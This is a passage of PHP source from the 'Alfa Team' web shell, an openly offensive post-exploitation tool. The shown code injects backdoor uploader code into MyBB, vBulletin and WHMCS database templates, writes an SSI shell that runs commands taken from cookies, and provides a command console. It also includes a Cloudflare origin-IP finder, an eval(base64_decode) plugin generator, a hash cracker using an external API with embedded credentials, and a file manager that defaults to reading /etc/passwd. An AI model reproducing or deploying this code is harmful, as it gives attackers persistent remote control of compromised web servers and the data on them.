1545. $saveurl = $AlfaSole->Send($path."/pwreset.php");
1546. $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
1547. $AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
1548. $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
1549. $Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
1550. __alert("shell injectet...");
1551. $ff= 'http://'.$path."/solevisible.php";
1552. output($ff);
1553. }else{ echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target => </font><a href='".$path."/pwreset.php' target='_blank'>".$path."/pwreset.php</a><br/><font color='#FFFFFF'> And Reset Password With Email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color='#FFFFFF'>And Go To => </font><a href='".$path."/solevisible.php' target='_blank'>".$path."/solevisible.php</a></b></center><br><br>";
1554. }}else{__alert('Path is not Valid...');
1555. }}} }if(isset($_POST['alfa2']) && $_POST['alfa2']== 'mybb'){ AlfaNum(1,2,3,5);
1556. echo __pre()."<p><div class='txtfont_header'>| MyBB |</div></p><center><center>".getConfigHtml("mybb")."<form id='sendajax' onSubmit=\"g('ShellInjectors',null,null,'mybb',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value);
1557. return false;
1558. \" method=POST>
1559. ";
1560. $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id'=>'db_name' ,'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id'=>'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id'=>'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id'=>'db_prefix','inputValue' => 'mybb_', 'inputSize' => '50') );
1561. create_table($table);
1562. echo $selector;
1563. echo "<p><input type=submit value=' '></p></form></center></center>";
1564. if(isset($_POST['alfa6'])) { $dbu = $_POST['alfa6'];
1565. $dbn = $_POST['alfa7'];
1566. $dbp = $_POST['alfa8'];
1567. $dbh = $_POST['alfa9'];
1568. $prefix = $_POST['alfa10'];
1569. $method = $_POST['alfa4'];
1570. $shellCode = "{\${".ALFA_UPLOADER."}}";
1571. $newinshell = str_replace("'","\'",$shellCode);
1572. if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){ $conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
1573. $inject = "select template from {$prefix}templates where title= 'calendar'";
1574. $result = mysqli_query($conn, $inject) or die (mysqli_error($conn));
1575. $GetTemp = mysqli_fetch_assoc($result);
1576. $saveDate = $GetTemp['template'];
1577. $repsave = str_replace($shellCode,"",$saveDate);
1578. $repsave = str_replace("'","\'",$repsave);
1579. $createShell = "update {$prefix}templates SET template= '".$newinshell.$repsave."' where title = 'calendar'";
1580. $result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn));
1581. $geturl = "select value from {$prefix}settings where name= 'bburl'";
1582. $findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn));
1583. $rowb = mysqli_fetch_assoc($findurl);
1584. $furl = $rowb['value'];
1585. $realurl = parse_url($furl,PHP_URL_HOST);
1586. $realpath = parse_url($furl,PHP_URL_PATH);
1587. $res = false;
1588. $AlfaCurl = new AlfaCURL();
1589. if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto' ){ if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){ @fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\r\n");
1590. @fputs($fsock, "HOST: $realurl\r\n");
1591. @fputs($fsock, "Connection: close\r\n\r\n");
1592. $check = fgets($fsock);
1593. if(preg_match("/200 OK/i",$check)){ $repairdbtemp = "update {$prefix}templates SET template= '$repsave' where title = 'calendar'";
1594. $clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));
1595. $res = true;
1596. } @fclose($fsock);
1597. }}elseif(function_exists('curl_version') && $method == 'auto'){ $AlfaCurl->Send($realurl.$realpath."/calendar.php");
1598. $res = true;
1599. } if($res){ $ff = 'http://'.$realurl.$realpath."/solevisible.php";
1600. output($ff);
1601. }else{ $ff = 'http://'.$realurl.$realpath."/calendar.php";
1602. $fff = 'http://'.$realurl.$realpath."/solevisible.php";
1603. echo "<br><pre id='strOutput' style='margin-top:5px' class='ml1'><br><center><b><font color='#FFFFFF'>Please Go To Target => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color='#FFFFFF'>And Go To => </font><a href='".$fff."' target='_blank'>".$fff."</a></b></center><br><br>";
1604. }}}} if(isset($_POST['alfa3']) && $_POST['alfa3']== 'vb'){ AlfaNum(1,2,7,9,10);
1605. echo __pre().'<p><div class="txtfont_header">| vbulletin |</div></p><p>'.getConfigHtml('vb').'</p><form name="frm" method="POST" onsubmit="g(\'ShellInjectors\',null,null,this.lo.value,\'vb\',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value);
1606. return false;
1607. ">';
1608. $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id'=>'db_name','inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id'=>'db_user','inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id'=>'db_pw','inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id'=>'db_prefix','inputValue' => '', 'inputSize' => '50') );
1609. create_table($table);
1610. echo $selector;
1611. echo '<p><input type="submit" value=" " /></p></form></center>';
1612. if(isset($_POST['alfa4'])&&!empty($_POST['alfa4'])){ $method = $_POST['alfa8'];
1613. $code = "{\${".ALFA_UPLOADER."}}{\${exit()}}&";
1614. $conn=@mysqli_connect($_POST['alfa2'],$_POST['alfa4'],$_POST['alfa5'],$_POST['alfa7']) or die(@mysqli_error($conn));
1615. $rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='faq'";
1616. $recivedata = @mysqli_query($conn,$rec);
1617. $getd = @mysqli_fetch_assoc($recivedata);
1618. $savetoass = $getd['template'];
1619. $code = str_replace("'","\'",$code);
1620. $p = "UPDATE ".$_POST['alfa6']."template SET `template`='".$code."' WHERE `title`='faq'";
1621. $ka= @mysqli_query($conn,$p) or die(mysqli_error($conn));
1622. $geturl = @mysqli_query($conn,"select `value` from ".$_POST['alfa6']."setting WHERE `varname`='bburl'");
1623. $getval = @mysqli_fetch_assoc($geturl);
1624. $saveval = $getval['value'];
1625. $realurl = parse_url($saveval,PHP_URL_HOST);
1626. $realpath = parse_url($saveval,PHP_URL_PATH);
1627. $res = false;
1628. $AlfaCurl = new AlfaCURL();
1629. if(extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto'){ if($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){ @fputs($fsock, "GET $realpath/faq.php HTTP/1.1\r\n");
1630. @fputs($fsock, "HOST: $realurl\r\n");
1631. @fputs($fsock, "Connection: close\r\n\r\n");
1632. $check = fgets($fsock);
1633. if(preg_match("/200 OK/i",$check)){ $p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".str_replace("'","\'",$savetoass)."' WHERE title ='faq'";
1634. $ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
1635. $res = true;
1636. } @fclose($fsock);
1637. } }elseif(function_exists('curl_version') && $method == 'auto'){ $AlfaCurl->Send($realurl.$realpath."/faq.php");
1638. $p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".str_replace("'","\'",$savetoass)."' WHERE title ='faq'";
1639. $ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
1640. $res = true;
1641. } if($res){ $ff = 'http://'.$realurl.$realpath."/solevisible.php";
1642. output($ff);
1643. }else{ $ff = 'http://'.$realurl.$realpath."/faq.php";
1644. $fff = 'http://'.$realurl.$realpath."/solevisible.php";
1645. echo "<center><p><font color=\"#FFFFFF\">First Open This Link => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color=\"#FFFFFF\">Second Open This Link => </font><a href='".$fff."' target='_blank'>".$fff."</a></center></p>";
1646. }}} echo '</div>';
1647. alfafooter();
1648. } function alfaConsole(){echo alfaEx($_POST['cmd']);
1649. } function alfacmd(){ alfahead();
1650. $help = "Help:\n\tChange Color :\n\t\tSyntax: color [red - yellow - green etc...]\n\t\tExample: color green\n\n\tClear Outputs:\n\t\tSyntax: clear | cls | reset";
1651. echo '<div class=header>';
1652. echo '<form name="cf" onsubmit="execute();
1653. return false;
1654. "><textarea class="bigarea" id="output" name="output" style="border-bottom:0;
1655. margin:0;
1656. " readonly>'.$help.'</textarea>
1657. <table style="border:1px solid;
1658. background-color:;
1659. border-top:0px;
1660. " cellpadding="0" cellspacing="0" width="100%"><tr><td width="1%">></td><td><input id="cmd" type="text" name="cmd" placeholder="ls -la" style="border:0px;
1661. width:100%;
1662. ""></td></tr></table>
1663. </form>';
1664. echo '</div>';
1665. alfafooter();
1666. } function alfassiShell(){ alfahead();
1667. echo '<div class=header>';
1668. @mkdir('alfa_shtml',0755);
1669. @chdir('alfa_shtml');
1670. alfacgihtaccess('shtml');
1671. $code = '<!--#config errmsg="[Error]"--><!--#config sizefmt="bytes"--><!--#if expr="(\"$HTTP_COOKIE\" = \"\") || (\"$REQUEST_METHOD\" != \"GET\")" --><!--#set var="shl" value="ls -la" --><!--#else --><!--#set var="shl" value=$HTTP_COOKIE --><!--#endif --> <!--#if expr="(\"$HTTP_COOKIE\" = \"\") || (\"$REQUEST_METHOD\" != \"POST\")" --><!--#set var="inc" value="/../../../../../../../etc/passwd" --><!--#else --><!--#set var="inc" value=$HTTP_COOKIE --> <!--#endif --> <html><head><title>Alfa Team SSI Shell</title><script language="javascript">function doit( mode ) {if( document.cookie != "" ) {var cookies = document.cookie.split( ";
1672. " );
1673. for( var i = 0;
1674. i < cookies.length;
1675. ++i )document.cookie = cookies[ i ] + ";
1676. expires=Thu, 01 Jan 1970 00:00:00 GMT";
1677. }document.cookie = document.getElementById( mode ).value;
1678. document.location.reload();
1679. }function toggle( id ) { document.getElementById( id ).style.display = (document.getElementById( id ).style.display == "none") ? "block" : "none";
1680. }</script></head><body bgcolor="#000000" alink="blue" vlink="blue"><br><div><center><h3><font color="#59cc33">| Alfa Team SSI Shell |</font></h3></center><br><center><b><u><font size="+1" onclick="toggle(\'env\');
1681. " style="cursor:pointer;
1682. color:red;
1683. ">Enviroment info</font></u></b></center><div id="env" style="display:none;
1684. color:#67ABDF;
1685. "><br><pre><!--#printenv--></pre><br></div></div><br><div><center><b><u><font size="+1" onclick="toggle(\'shl\');
1686. " style="cursor:pointer;
1687. color:red;
1688. ">Command for shell</font></u></b></center></div><div align="center" width="100%" border="0" id="shl" style=background-color:#000000;
1689. <!--#if expr="\"$REQUEST_METHOD\" != \"GET\"" -->display:none;
1690. <!--#endif -->><br><b><font color="#67ABDF">Enter command</font></b>:&nbsp;
1691. &nbsp;
1692. &nbsp;
1693. <form method="get" onsubmit="doit(\'command\');
1694. "><input type="text" size="80" id="command">&nbsp;
1695. <input type="submit" value="Run"></form><br><center><b><font size="+1" color="#67ABDF">Result</font></b></center><br><b><font color="#67ABDF">Executed command:</font></b>&nbsp;
1696. &nbsp;
1697. &nbsp;
1698. <b><font color="#67ABDF"><!--#echo var=shl --></font></b><br><textarea bgcolor="#e4e0d8" cols="121" rows="15"><!--#exec cmd=$shl --></textarea> </div> <div><br><center><b><u><font size="+1" onclick="toggle(\'inc\');
1699. " style="cursor:pointer;
1700. color:red;
1701. ">Operations on files</font></u></b></center><div id="inc" align="center" width="100%" border="0" style=background-color:#000000;
1702. <!--#if expr="\"$REQUEST_METHOD\" != \"POST\"" -->style=display:none;
1703. <!--#endif -->><br><b><font color="#67ABDF">View file (virtual include):</font></b>&nbsp;
1704. &nbsp;
1705. &nbsp;
1706. <form method="post" onsubmit="doit(\'vfile\');
1707. "><input type="text" size=80 id="vfile">&nbsp;
1708. <input type="submit" value="Run"></form><br><b><font color="#67ABDF">Included file:</font></b>&nbsp;
1709. &nbsp;
1710. &nbsp;
1711. <b><font color="#67ABDF"><!--#echo var=inc --></font></b><br><b><font color="#67ABDF">Size:</font></b>&nbsp;
1712. &nbsp;
1713. &nbsp;
1714. <b><font color="#67ABDF"><!--#fsize virtual=$inc -->&nbsp;
1715. bytes</font></b><br><textarea bgcolor="#e4e0d8" cols="121" rows="15"><!--#include virtual=$inc --></textarea><br></div></div></body></html>';
1716. @__write_file('alfa_ssi.shtml',$code);
1717. @chmod("alfa_ssi.shtml",0755);
1718. echo AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml');
1719. echo '</div>';
1720. alfafooter();
1721. } function alfacloudflare(){ alfahead();
1722. AlfaNum(8,9,10,7,6,5,4,3);
1723. echo "<div class=header><center><br><div class='txtfont_header'>| Cloud Flare ByPasser |</div><br><form action='' onsubmit=\"g('cloudflare',null,this.url.value,'>>');
1724. return false;
1725. \" method='post'>
1726. <p><div class='txtfont'>Target:</div> <input type='text' size=30 name='url' style='text-align:center;
1727. ' placeholder=\"target.com\"> <input type='submit' name='go' value=' ' /></p></form></center>";
1728. if($_POST['alfa2'] && $_POST['alfa2'] == '>>'){ $url = $_POST['alfa1'];
1729. if(!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)){ $url = preg_replace('/^(https?):\/\//', '', $url);
1730. $url = "http://www.".$url;
1731. } $headers = @get_headers($url, 1);
1732. $server = $headers['Server'];
1733. $subs = array('news.','download.','','cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns1.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.');
1734. if(preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches)) { if($matches[2] != 'www') { $url = preg_replace('/^(https?):\/\//', '', $url);
1735. } else { $url = explode($matches[0], $url);
1736. $url = $url[1];
1737. } } if(is_array($server))$server = $server[0];
1738. echo __pre();
1739. if(preg_match('/cloudflare/i', $server)) echo "\n[+] CloudFlare detected: {$server}\n<br>";
1740. else echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
1741. echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";
1742. echo "[+] Searching for more IP addresses.\n\n<br><br>";
1743. for($x=0;
1744. $x<count($subs);
1745. $x++) { $site = $subs[$x] . $url;
1746. $ip = is_ipv4(gethostbyname($site));
1747. if($ip == '(Null)') continue;
1748. echo "Trying {$site}: {$ip}\n<br>";
1749. } echo "\n[+] Finished.\n<br>";
1750. } echo '</div>';
1751. alfafooter();
1752. } function is_ipv4($ip){ return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
1753. } function __alert($s){ echo '<center>'.__pre().$s.'</center>';
1754. } function create_table($data){ echo '<table border="1">';
1755. foreach ($data as $key => $val){ $array = array();
1756. foreach($val as $k => $v){ $array[$k] = $v;
1757. } echo "<tr><td><div class='tbltxt' style='color:#".$array['color']."'>".$array['tdName']."</div></td><td><input type='text' id='".$array['id']."' name='".$array['inputName']."' ".($array['placeholder']?'placeholder':'value')."='".$array['inputValue']."' size='".$array['inputSize']."' ".($array['disabled']?'disabled':'')."></td></tr>";
1758. } echo '</table>';
1759. } function alfaphp2xml(){ alfahead();
1760. AlfaNum(8,9,10,7,6,5,4,3);
1761. echo "<div class=header><center><p><div class='txtfont_header'>| Shell For vBulletin |</div></p><form onsubmit=\"g('php2xml',null,this.code.value,'>>');
1762. return false;
1763. \" method='post'>
1764. <p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/>
1765. <input type='submit' name='go' value=' ' /></p></form></center>";
1766. if($_POST['alfa2']&&$_POST['alfa2']=='>>'){ echo __pre()."<p><center><textarea rows='10' name='users' cols='80'>";
1767. echo '<?xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[\'PHP_SELF\'],"subscriptions.php")){eval(base64_decode(\''.__ZW5jb2Rlcg($_POST['alfa1']).'\'));
1768. exit;
1769. }]]></phpcode></plugin></plugins>';
1770. echo '</textarea></center></p>';
1771. } echo '</center></div>';
1772. alfafooter();
1773. } function alfacpcrack(){ alfahead();
1774. echo '<div class=header><center><p><div class="txtfont_header">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'dec\')">| DeCrypter | </a><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'analyzer\')">| Hash Analyzer | </a></h3></center>';
1775. if($_POST['alfa1']=='dec'){ $algorithms = array('md5'=>'MD5','md4'=>'MD4','sha1'=>'SHA1','sha256'=>'SHA256','sha384'=>'SHA384','sha512'=>'SHA512','ntlm'=>'NTLM');
1776. echo '<center><div class="txtfont_header">| DeCrypter |</div><br><br>
1777. <form onsubmit="g(\'cpcrack\',null,\'dec\',this.md5.value,\'>>\',this.alg.value);
1778. return false;
1779. "><div class="txtfont">Decrypt Method:</div> <select name="alg" style="width:100px;
1780. ">';
1781. foreach($algorithms as $key=>$val){echo('<option value="'.$key.'">'.$val.'</option>');
1782. } echo'</select><input type="text" placeholder="Hash" name="md5" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
1783. if($_POST['alfa3'] == '>>'){ $hash = $_POST['alfa2'];
1784. if(!empty($hash)){ $hash_type = $_POST['alfa4'];
1785. $email = "solevisible@gmail.com";
1786. $code = "7b9fa79f92c3cd96";
1787. $target = "http://md5decrypt.net/Api/api.php?hash=".$hash."&hash_type=".$hash_type."&email=".$email."&code=".$code;
1788. $resp = @file_get_contents($target);
1789. if($resp==''){ $get = new AlfaCURL();
1790. $resp = $get->Send($target);
1791. } echo __pre().'<center>';
1792. switch($resp){ case('CODE ERREUR : 001'):echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>";
1793. break;
1794. case('CODE ERREUR : 003'):echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>";
1795. break;
1796. case('CODE ERREUR : 004'):echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>";
1797. break;
1798. case('CODE ERREUR : 005'):echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>";
1799. break;
1800. } if(substr($resp,0,4)!='CODE'&&$resp!=''){ echo "<b>Result: <font color='green'>".$resp."</font></b>";
1801. }elseif(substr($resp,0,4)!='CODE'){ echo "<font color='red'>NoT Found</font><br />";
1802. } echo('</center>');
1803. } } } if($_POST['alfa1']=='analyzer'){ echo '<center><p><div class="txtfont_header">| Hash Analyzer |</div></p>
1804. <form onsubmit="g(\'cpcrack\',null,\'analyzer\',this.hash.value,\'>>\');
1805. return false;
1806. ">
1807. <div class="txtfont">Hash: </div> <input type="text" placeholder="Hash" name="hash" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
1808. if($_POST['alfa3'] == '>>'){ $hash = $_POST['alfa2'];
1809. if(!empty($hash)){ $curl = new AlfaCURL();
1810. $resp = $curl->Send("http://md5decrypt.net/en/HashFinder/","post","hash={$hash}&crypt=Search");
1811. echo(__pre().'<center>');
1812. if(preg_match('#<fieldset class="trouve">(.*?)</fieldset>#',$resp,$s)){ echo('<font color="green">'.$s[1].'</font>');
1813. }else{ echo('<font color="red">Not Found...!</font>');
1814. } echo('</center><br>');
1815. } } } echo '</div>';
1816. alfafooter();
1817. } function alfafooter(){ if(!isset($_POST['ajax'])){ echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >
1818. <tr>
1819. <td width='17%'><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');
1820. this.f.value='';
1821. return false;
1822. \"><span><font color=#27979B>Make File : </font></span><br><input class='dir' type='text' name=f value=' '> <input type='submit' value=' '></form></td>
1823. <td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);
1824. this.d.value='';
1825. return false;
1826. \"><span><font color=#27979B>Make Dir : </font></span><br><input class='dir' type='text' name='d' value=' '> <input type='submit' value=' '></form></td>
1827. <td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);
1828. this.del.value='';
1829. return false;
1830. \"><span><font color=#27979B>Delete : </font></span><br><input class='dir' type='text' name='del' value=' '> <input type='submit' value=' '></form></td>
1831. <td width='19%'><form onsubmit=\"g('FilesTools',null,this.f.value,'chmod');
1832. this.f.value='';
1833. return false;
1834. \"><span><font color=#27979B>Chmod : </font></span><br><input class='dir' type=text name=f value=' '> <input type='submit' value=' '></form></td>
1835. </tr>
1836. <tr>
1837. <td colspan='2'><form onsubmit='g(\"FilesMan\",this.c.value,\"\");
1838. return false;
1839. '><span><font color=#27979B>Change Dir : </font></span><br><input class='foottable' id='footer_cwd' type='text' name='c' value='".htmlspecialchars($GLOBALS['cwd'])."'> <input type='submit' value=' '></form></td>
1840. <td colspan='2'><form onsubmit=\"g('FilesTools','".$GLOBALS['cwd']."',this.file.value,'auto');
1841. return false;
1842. \"><span><font color=#27979B>Read File : </font></span><br><input class='foottable' type='text' name='file' value='/etc/passwd'> <input type='submit' value=' '></form></td>
1843. </tr>
1844. <tr>
1845. <td colspan='4'><form onsubmit=\"g('proc',null,this.c.value);
1846. this.c.value='';
1847. return false;
1848. \"><span><font color=#27979B>Execute :</font></span><br><input class='foottable' type='text' name='c' value=' '> <input type='submit' value=' '></form></td>
1849. </tr>
1850. <tr>
1851. <td colspan='4'><form onsubmit='u(this);
1852. return false;
1853. ' name='footer_form' method='post' ENCTYPE='multipart/form-data'>
1854. <input type='hidden' name='a' value='FilesMAn'>
1855. <input type='hidden' name='c' value='" . $GLOBALS['cwd'] ."'>
1856. <input type='hidden' name='alfa1' value='uploadFile'>
1857. <input type='hidden' name='charset' value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
1858. <span><font color=#27979B>Upload file:</font> <button id='addup' onclick='addnewup();
1859. return false;
1860. '><b>+</b></button></span><p id='pfooterup'><label class='inputfile' for='footerup'><span id='__fnameup'></span> <strong>&nbsp;
1861. &nbsp;
1862. Choose a file</strong></label><input id='footerup' class='toolsInp' type='file' name='f[]' onChange='handleup(this,0);
1863. '></p><input type='submit' value=' '></form><br>[ ./AlfaTeam &copy;
1864. 2012-".date('Y')." ]</td>
1865. </tr>
1866. </table>
1867. </div>
1868. </body>
1869. </html>
1870. ";
1871. }} if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;
1872. } } if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;
1873. } } function alfaWhich($p) { $path = alfaEx('which ' . $p);
1874. if(!empty($path)) return $path;
1875. return false;
1876. } function alfaSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB';
1877. elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB';
1878. elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB';
1879. else return $s . ' B';
1880. } function alfaPerms($p) { if (($p & 0xC000) == 0xC000)$i = 's';
1881. elseif (($p & 0xA000) == 0xA000)$i = 'l';
1882. elseif (($p & 0x8000) == 0x8000)$i = '-';
1883. elseif (($p & 0x6000) == 0x6000)$i = 'b';
1884. elseif (($p & 0x4000) == 0x4000)$i = 'd';
1885. elseif (($p & 0x2000) == 0x2000)$i = 'c';
1886. elseif (($p & 0x1000) == 0x1000)$i = 'p';
1887. else $i = 'u';
1888. $i .= (($p & 0x0100) ? 'r' : '-');
1889. $i .= (($p & 0x0080) ? 'w' : '-');
1890. $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
1891. $i .= (($p & 0x0020) ? 'r' : '-');
1892. $i .= (($p & 0x0010) ? 'w' : '-');
1893. $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
1894. $i .= (($p & 0x0004) ? 'r' : '-');
1895. $i .= (($p & 0x0002) ? 'w' : '-');
1896. $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
1897. return $i;
1898. } function alfaPermsColor($f) { if (!@is_readable($f)) return '<font color=#FF0000>'. substr(sprintf('%o', @fileperms($f)),-4) .'<font color=white> >> </font>'.alfaPerms(@fileperms($f)) . '</font>';
1899. elseif (!@is_writable($f)) return '<font color=white>'. substr(sprintf('%o', @fileperms($f)),-4) .'<font color=white> >> </font>'.alfaPerms(@fileperms($f)) . '</font>';
1900. else return '<font color=#25ff00>'. substr(sprintf('%o', @fileperms($f)),-4) .'<font color=white> >> </font>'.alfaPerms(@fileperms($f)) . '</font>';
1901. } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir);
1902. while (false !== ($filename = readdir($dh))) $files[] = $filename;
1903. return $files;
1904. } } function reArrayFiles($file_post){ $file_ary = array();
1905. $file_count = count($file_post['name']);
1906. $file_keys = array_keys($file_post);
1907. for ($i=0;
1908. $i<$file_count;
1909. $i++) { foreach ($file_keys as $key) { $file_ary[$i][$key] = $file_post[$key][$i];
1910. } } return $file_ary;
1911. } function alfaFilesMan(){ alfahead();
1912. AlfaNum(8,9,10,7,6,5,4);
1913. echo '<div class="ajaxarea"><div class="header">';
1914. if(!empty ($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']);
1915. if(!empty($_POST['alfa1'])){ switch($_POST['alfa1']){ case 'uploadFile': $files = reArrayFiles($_FILES['f']);
1916. foreach($files as $file){ @move_uploaded_file($file['tmp_name'],$file['name']);
1917. } break;
1918. case 'mkdir': if(!@mkdir(trim($_POST['alfa2']))) echo "<b><font color='red'>Can't create new dir !</b></font>";
1919. break;
1920. case 'delete': function deleteDir($path){ $path = (substr($path,-1)=='/') ? $path:$path.'/';
1921. $dh = @opendir($path);
1922. while(($item = @readdir($dh)) !== false){ $item = $path.$item;
1923. if((basename($item) == "..") || (basename($item) == ".")) continue;
1924. $type = filetype($item);
1925. if ($type == "dir") deleteDir($item);
1926. else @unlink($item);
1927. } closedir($dh);
1928. @rmdir($path);
1929. } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f){ if($f == '..') continue;
1930. $f = urldecode($f);
1931. if(@is_dir($f)) deleteDir($f);
1932. else @unlink($f);
1933. } if(@is_dir(urldecode(@$_POST['alfa2']))) deleteDir(urldecode(@$_POST['alfa2']));
1934. else @unlink(urldecode(@$_POST['alfa2']));
1935. break;
1936. case 'paste': if($_SESSION['act'] == 'copy'&&isset($_SESSION['f'])){ function copy_paste($c,$s,$d){ if(@is_dir($c.$s)){ @mkdir($d.$s);
1937. $h = @opendir($c.$s);
1938. while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/');
1939. } elseif(is_file($c.$s)) @copy($c.$s, $d.$s);
1940. } foreach($_SESSION['f'] as $f) copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']);
1941. }elseif($_SESSION['act'] == 'move'&&isset($_SESSION['f'])){ function move_paste($c,$s,$d){ if(@is_dir($c.$s)){ @mkdir($d.$s);
1942. $h = @opendir($c.$s);
1943. while (($f = @readdir($h)) !== false) if(($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/');
1944. }elseif(@is_file($c.$s)) @copy($c.$s, $d.$s);
1945. } foreach($_SESSION['f'] as $f) @rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f);
1946. }elseif($_SESSION['act'] == 'zip'&&isset($_SESSION['f'])){ if(class_exists('ZipArchive')){ $zip = new ZipArchive();
1947. $zipX = "alfa_".rand(1,1000).".zip";
1948. if($zip->open($zipX, 1)){ @chdir($_SESSION['c']);
1949. foreach($_SESSION['f'] as $f){ if($f == '..')continue;
1950. if(@is_file($_SESSION['c'].$f)) $zip->addFile($_SESSION['c'].$f, $f);
1951. elseif(@is_dir($_SESSION['c'].$f)){ $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
1952. foreach($iterator as $key=>$value){ $key = str_replace('\\','/',realpath($key));
1953. if(@is_dir($key)){ if(in_array(substr($key, strrpos($key,'/')+1),array('.', '..')))continue;
1954. }else{$zip->addFile($key,$key);
1955. }}}} @chdir($GLOBALS['cwd']);
1956. $zip->close();
1957. __alert('>> '.$zipX.' << is created...');
1958. }} }elseif($_SESSION['act'] == 'unzip'&&isset($_SESSION['f'])){ if(class_exists('ZipArchive')){ $zip = new ZipArchive();
1959. foreach($_SESSION['f'] as $f) { if($zip->open($_SESSION['c'].$f)){ $zip->extractTo($GLOBALS['cwd']);
1960. $zip->close();
